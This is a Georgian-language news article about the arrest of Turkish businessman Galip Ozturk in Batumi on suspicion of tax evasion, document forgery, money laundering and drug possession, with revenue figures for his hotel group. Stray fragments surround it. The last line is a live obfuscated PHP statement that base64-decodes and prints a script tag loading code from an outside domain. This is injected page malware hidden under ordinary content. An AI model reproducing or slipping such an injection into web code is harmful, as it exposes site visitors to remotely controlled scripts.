celsiusi
ავერსი შნაიდერი
საგამოძიებო სამსახურმა ბიზნესმენ გალიფ ოზთურქის დაკავება დაადასტურა. შესაბამისი განცხადება უწყებამ გაავრცელა, რომელსაც უცვლელად გთავაზობთ:
 
"საქართველოს ფინანსთა სამინიტროს საგამოძიებო სამსახურის თანამშრომლებმა ერთი პირი დააკავეს საქართველოს ფინანსთა სამინისტროს საგამოძიებო სამსახურის წარმოებაში არსებულ სისხლის სამართლის საქმეზე, მოქალაქე გ.ო.-ს მიერ განსაკუთრებით დიდი ოდენობით გადასახადისთვის განზრახ თავის არიდების, ყალბი საანგარიშსწორებო დოკუმენტების დამზადება-გამოყენებისა და უკანონო შემოსავლის ლეგალიზაციის შესაძლო ფაქტზე მიმდინარე გამოძიების პროცესში, საქმის ვითარების გასარკვევად საჭირო მტკიცებულებების მოპოვების მიზნით, 2022 წლის 31 მაისს, სასამართლოს განჩინებების საფუძველზე, მოქალაქე გ.ო.-სთან, ასევე მასთან დაკავშირებულ პირებთან და კომპანიებში განხორციელდა საგამოძიებო და საპროცესო მოქმედებები.
 
გ.ო.-ს საცხოვრებელ მისამართზე, სასამართლოს განჩინების საფუძველზე ჩატარებული ჩხრეკის შედეგად, სხვა ნივთიერ მტკიცებულებებთან ერთად, ამოღებულ იქნა დიდი ოდენობით ფულადი თანხა, ასევე აღმოჩენილ იქნა სავარაუდოდ ნარკოტიკული და ფსიქოტროპული ნივთიერებები, რასთან დაკავშირებითაც გ.ო. დაკავებულ იქნა საქართველოს სისიხლის სამართლის კოდექსის 260-ე და 261-ე მუხლების პირველი ნაწილებით, რაც ითვალისწინებს თავისუფლების აღკვეთას 6 წლამდე ვადით.
 
საქმეზე ინტენსიურად გრძელდება შესაბამისი ღონისძიებები, რომლის შედეგების შესახებ, პერიოდულად მოხდება საზოგადოების ინფორმირება".
 
ცნობისთვის, ფინანსთა სამინისტროს საგამოძიებო სამსახური ბათუმში თურქი ბიზნესმენის გალიფ ოზთურქის კომპანიაში დღეს შევიდა.
 
შეგახსენებთ, დღეს ფინანსთა სამინისტროს საგამოძიებო სამსახური ბათუმში თურქ ბიზნესმენის გალიფ ოზთურქის კომპანიაში შევიდა, თუმცა უწყებას ფაქტთან დაკავშირებით ოფიციალური ინფორმაცია ამ დრომდე არ გაუვრცელებია.
 
აღსანიშნავია, რომ ბიზნესმენ გალიფ ოზთურქის საკუთრებაშია “მეტრო ჰოლდინგი”, რომელიც ბათუმში უმსხვილეს ტურისტულ ობიექტებს ფლობს. მათ შორისაა 455-ნომრიანი სასტუმრო “ეიფორია”, “ინტურისტი”, “მეტრო სქაი თაუერი” და “ბიზნეს ლეჯენდი”. ასევე ბათუმის უმსხვილესი სავაჭრო ცენტრი “მეტრო სითი”. 
 
ფინანსური ანგარიშის თანახმად, 2020 წელს სს “მეტრო ავრასია ინვესთმენთ ჯორჯიას” შემოსავალმა 43.8 მილიონი ლარი შეადგინა, ხოლო კომპანიის წმინდა ზარალი 52.5 მილიონი ლარი იყო. პანდემიამდე, ანუ 2019 წელს ჯგუფის ჯამური შემოსავალი 81 მილიონი ლარი, ზარალი კი 53 მილიონი ლარი იყო.
 
ჯგუფის აქტივების ზომა 535 მილიონი ლარია.
773
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");